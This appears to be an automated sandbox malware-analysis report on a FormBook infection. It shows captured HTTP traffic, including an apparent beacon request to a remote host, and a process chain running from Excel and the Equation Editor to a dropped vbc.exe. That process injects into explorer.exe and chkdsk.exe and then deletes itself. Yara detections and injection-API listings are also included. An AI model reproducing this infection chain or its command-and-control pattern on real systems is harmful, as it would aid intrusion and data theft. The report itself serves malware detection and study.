Jan 13, 2021 17:19:08.103316069 CET	902	IN	HTTP/1.1 404 Not Found Date: Wed, 13 Jan 2021 16:19:08 GMT Server: Apache Set-Cookie: is_mobile=0; path=/; domain=www.acdfr.com Vary: X-W-SSL,User-Agent Set-Cookie: language=en; expires=Wed, 27-Jan-2021 16:19:08 GMT; Max-Age=1209600; path=/ Cache-Control: private X-Host: pages20.sf2p.intern.weebly.net X-UA-Compatible: IE=edge,chrome=1 Content-Length: 3803 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 67 64 70 72 2f 67 64 70 72 73 63 72 69 70 74 2e 6a 73 3f 62 75 69 6c 64 54 69 6d 65 3d 31 36 31 30 34 37 39 38 34 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 63 64 6e 31 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 64 65 76 65 6c 6f 70 65 72 2f 6e 6f 6e 65 2e 69 63 6f 22 20 2f 3e 0a 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 50 72 6f 78 69 6d 61 20 4e 6f 76 61 27 3b 0a 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 09 09 09 73 72 63 3a 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 75 69 2d 66 72 61 6d 65 77 6f 72 6b 2f 66 6f 6e 74 73 2f 70 72 6f 78 69 6d 61 2d 6e 6f 76 61 2d 6c 69 67 68 74 2f 33 31 41 43 39 36 5f 30 5f 30 2e 65 6f 74 22 29 3b 0a 09 09 09 73 72 63 3a 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 75 69 2d 66 72 61 6d 65 77 6f 72 6b 2f 66 6f 6e 74 73 2f 70 72 6f 78 69 6d 61 2d 6e 6f 76 61 2d 6c 69 67 68 74 2f 33 31 41 43 39 36 5f 30 5f 30 2e 65 6f 74 3f 23 69 65 66 69 78 22 29 20 66 6f 72 6d 61 74 28 22 65 6d 62 65 64 64 65 64 2d 6f 70 65 6e 74 79 70 65 22 29 2c 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 75 69 2d 66 72 61 6d 65 77 6f 72 6b 2f 66 6f 6e 74 73 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head><script src="/gdpr/gdprscript.js?buildTime=1610479848"></script><title>404 - Page Not Found</title><meta http-equiv="content-type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="robots" content="noarchive" /><link rel="shortcut icon" href="//cdn1.editmysite.com/developer/none.ico" /><style type="text/css">@font-face {font-family: 'Proxima Nova';font-weight: 300;src: url("//cdn2.editmysite.com/components/ui-framework/fonts/proxima-nova-light/31AC96_0_0.eot");src: url("//cdn2.editmysite.com/components/ui-framework/fonts/proxima-nova-light/31AC96_0_0.eot?#iefix") format("embedded-opentype"), url("//cdn2.editmysite.com/components/ui-framework/fonts
Jan 13, 2021 17:19:08.103368044 CET	902	IN	Data Raw: 2f 70 72 6f 78 69 6d 61 2d 6e 6f 76 61 2d 6c 69 67 68 74 2f 33 31 41 43 39 36 5f 30 5f 30 2e 77 6f 66 66 22 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 2c 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 Data Ascii: /proxima-nova-light/31AC96_0_0.woff") format("woff"), url("//cdn2.editmysite.com/components/ui-framework/fonts
Jan 13, 2021 17:19:08.103406906 CET	904	IN	Data Raw: 2f 70 72 6f 78 69 6d 61 2d 6e 6f 76 61 2d 6c 69 67 68 74 2f 33 31 41 43 39 36 5f 30 5f 30 2e 74 74 66 22 29 20 66 6f 72 6d 61 74 28 22 74 72 75 65 74 79 70 65 22 29 3b 0a 09 09 7d 0a 0a 09 09 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 09 09 09 66 6f Data Ascii: /proxima-nova-light/31AC96_0_0.ttf") format("truetype");}@font-face {font-family: 'Proxima Nova';src: url("//cdn2.editmysite.com/components/ui-framework/fonts/proxima-nova-regular/31AC96_1_0.eot");src: url("//cdn2.editmysite
Jan 13, 2021 17:19:08.103434086 CET	904	IN	Data Raw: 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 09 09 09 62 6f 72 64 65 Data Ascii: ox-sizing: border-box;text-align: center;background-color: white;border: 1px solid #D4D4D4;hei
Jan 13, 2021 17:19:08.103472948 CET	905	IN	Data Raw: 67 68 74 3a 20 33 33 35 70 78 3b 0a 09 09 09 77 69 64 74 68 3a 20 34 38 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 25 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 Data Ascii: ght: 335px;width: 484px;margin: 0 auto;margin-top: 10%;-webkit-box-shadow: 0px 0px 41px -8px rgba(237,234,237,1);-moz-box-shadow: 0px 0px 41px -8px rgba(237,234,237,1);box-shadow: 0px 0px 41px -8px rgba(237,234,237,1);

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.22	49170	94.73.146.42	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 17:19:13.315119028 CET	906	OUT	GET /bw82/?CXi4A=gXrXRfH0yDoHcf-&UL0xqd7P=CMr/hCS97wyXOcHcTlwKDrCPfcrQCABATO63SlwWoNIQfxte8yY+fmJ5LqnYq3pklGkZyw== HTTP/1.1 Host: www.h2oturkiye.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 17:19:13.394834995 CET	907	IN	HTTP/1.1 404 Not Found Connection: close Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html Content-Length: 1237 Date: Wed, 13 Jan 2021 16:19:13 GMT Server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" ><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised tha
Jan 13, 2021 17:19:13.394875050 CET	907	IN	Data Raw: 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f Data Ascii: t LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2396 Parent PID: 584

General

Start time:	17:16:49
Start date:	13/01/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f510000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2512 Parent PID: 584

General

Start time:	17:17:09
Start date:	13/01/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 2812 Parent PID: 2512

General

Start time:	17:17:11
Start date:	13/01/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x11d0000
File size:	844800 bytes
MD5 hash:	6A763ED09B2FD9F663BCB0AF7B17D492
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2175872234.00000000036B9000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2175872234.00000000036B9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2175872234.00000000036B9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2175312527.00000000026B1000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: vbc.exe PID: 2732 Parent PID: 2812

General

Start time:	17:17:17
Start date:	13/01/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Public\vbc.exe
Imagebase:	0x11d0000
File size:	844800 bytes
MD5 hash:	6A763ED09B2FD9F663BCB0AF7B17D492
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: vbc.exe PID: 2752 Parent PID: 2812

General

Start time:	17:17:18
Start date:	13/01/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\vbc.exe
Imagebase:	0x11d0000
File size:	844800 bytes
MD5 hash:	6A763ED09B2FD9F663BCB0AF7B17D492
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2220114080.0000000000190000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2220114080.0000000000190000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2220114080.0000000000190000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2220171178.0000000000350000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2220171178.0000000000350000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2220171178.0000000000350000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2220222146.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 1388 Parent PID: 2752

General

Start time:	17:17:22
Start date:	13/01/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0xffca0000
File size:	3229696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: chkdsk.exe PID: 1772 Parent PID: 1388

General

Start time:	17:17:39
Start date:	13/01/2021
Path:	C:\Windows\SysWOW64\chkdsk.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\chkdsk.exe
Imagebase:	0x330000
File size:	16384 bytes
MD5 hash:	A01E18A156825557A24A643A2547AA8C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2370481869.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2370639916.0000000000260000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2370639916.0000000000260000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2370639916.0000000000260000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2370580381.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2370580381.00000000001A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2370580381.00000000001A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 1840 Parent PID: 1772

General

Start time:	17:17:43
Start date:	13/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\Public\vbc.exe'
Imagebase:	0x4a300000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 2812 Parent PID: 2512 vbc.exeCOMMON

Executed Functions

Function 00363670, Relevance: 3.9, Strings: 3, Instructions: 187COMMON

Download Yara Rule

Strings

`!Dm, xrefs: 00363989
`!Dm, xrefs: 00363973
`!Dm, xrefs: 003638BD

Memory Dump Source

Source File: 00000004.00000002.2168318781.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID:
String ID: `!Dm$`!Dm$`!Dm
API String ID: 0-561183730
Opcode ID: f2fb9f42d44f9927afa5ba6a16236efa919a91abb84c588b33841578bb4e3fcb
Instruction ID: de75275f466db37cb558e1f74a4e3c3dc3bd90e43265fbdf4cc1cd0a14bb9d0a
Opcode Fuzzy Hash: f2fb9f42d44f9927afa5ba6a16236efa919a91abb84c588b33841578bb4e3fcb
Instruction Fuzzy Hash: C4812574E04218DFDB15DFA9D8886ADBBB6FF89300F10C02AE50AA7399DB300A45CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00363E48, Relevance: 3.5, Strings: 2, Instructions: 1016COMMON

Download Yara Rule

Strings

TVDm, xrefs: 00363FEB
3/d, xrefs: 0036436D

Memory Dump Source

Source File: 00000004.00000002.2168318781.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID:
String ID: TVDm$3/d
API String ID: 0-16479643
Opcode ID: 4e7f6dc4d497a9396de2c31f0c7452bd36d0a8b8c6ece4e08e55255e18da3af2
Instruction ID: 831d50fca44d82fe3d07116fd9c799b8b14e5f607965823c95913db679067cab
Opcode Fuzzy Hash: 4e7f6dc4d497a9396de2c31f0c7452bd36d0a8b8c6ece4e08e55255e18da3af2
Instruction Fuzzy Hash: 6CB2E375E00228CFDB65CF69C984AD9BBB2FF89304F1581E9D509AB225DB319E91CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00363AE8, Relevance: 1.4, Strings: 1, Instructions: 169COMMON

Download Yara Rule

Strings

@2Dm, xrefs: 00363D1C

Memory Dump Source

Source File: 00000004.00000002.2168318781.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID:
String ID: @2Dm
API String ID: 0-984162619
Opcode ID: 01aaedc7562d1cb70459c9ec545bc783bbb2de1672f2bd20c65995344bc9b1d1
Instruction ID: acdee23358e5882c1660c25c1c41fa2eeb63c136627bd25d63cbc05f8b07a9d0
Opcode Fuzzy Hash: 01aaedc7562d1cb70459c9ec545bc783bbb2de1672f2bd20c65995344bc9b1d1
Instruction Fuzzy Hash: 81716FB4A003098FD748EFBAE858A9EBBF3AFC9304F04C539D0059B669EB7019458F51

Uniqueness

Uniqueness Score: -1.00%

Function 00363AF8, Relevance: 1.4, Strings: 1, Instructions: 164COMMON

Download Yara Rule

Strings

@2Dm, xrefs: 00363D1C

Memory Dump Source

Source File: 00000004.00000002.2168318781.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID:
String ID: @2Dm
API String ID: 0-984162619
Opcode ID: 2c6916d166bcf4d866002479ed82a948e90873f402c11068002e30a2b70d5b40
Instruction ID: 7e6df1548cb79465e5138035716a48c9eee451a8533954b95786c30fcf25c903
Opcode Fuzzy Hash: 2c6916d166bcf4d866002479ed82a948e90873f402c11068002e30a2b70d5b40
Instruction Fuzzy Hash: 46614DB4A003098FD748EFBAE848A9EBBF7AFC9304F04C539D4059B669EB7059458F51

Uniqueness

Uniqueness Score: -1.00%

Function 005A0048, Relevance: 1.8, APIs: 1, Instructions: 321processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 005A030F

Memory Dump Source

Source File: 00000004.00000002.2171472635.00000000005A0000.00000040.00000001.sdmp, Offset: 005A0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 85df88f26c2bc4430ed796c49be29f8955790710547f984f7e259098bcf6824f
Instruction ID: cc4199b8ea41c7dab90b9784d631db32ff6e0aac6a409694c8464e23b288437d
Opcode Fuzzy Hash: 85df88f26c2bc4430ed796c49be29f8955790710547f984f7e259098bcf6824f
Instruction Fuzzy Hash: 5EC10370D002298BDF20CFA4C841BEDBBB1BF49304F10A5AAD959B7280DB749A85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0036FA40, Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0036FB13

Memory Dump Source

Source File: 00000004.00000002.2168318781.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 77358fffabb845814ea1e3dfa08129ccab1fc17f42ee92d309238dbbcf157c08
Instruction ID: 62d42fce6bc38ae4aa011846ea5e54cd2394f38901e5564193d537629ff4cf5f
Opcode Fuzzy Hash: 77358fffabb845814ea1e3dfa08129ccab1fc17f42ee92d309238dbbcf157c08
Instruction Fuzzy Hash: 744198B4D012589FCF00CFA9D884AEEFBF5BB49314F24942AE819B7240D734AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0036FB98, Relevance: 1.6, APIs: 1, Instructions: 106COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0036FC4A

Memory Dump Source

Source File: 00000004.00000002.2168318781.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 903e609dd062bf4f0da9ab0e5c84b48b6039b6d6897795a8a4ca3f7a1bdd20be
Instruction ID: ccbb5c15c6ee2a182b47899f30f79a2dd953456b58f7e652ae65aa64a1b27e28
Opcode Fuzzy Hash: 903e609dd062bf4f0da9ab0e5c84b48b6039b6d6897795a8a4ca3f7a1bdd20be
Instruction Fuzzy Hash: A24199B5D002589FCF00CFA9E884AEEFBB5BB49310F14A42AE815B7200D775A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0036F920, Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0036F9CA

Memory Dump Source

Source File: 00000004.00000002.2168318781.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
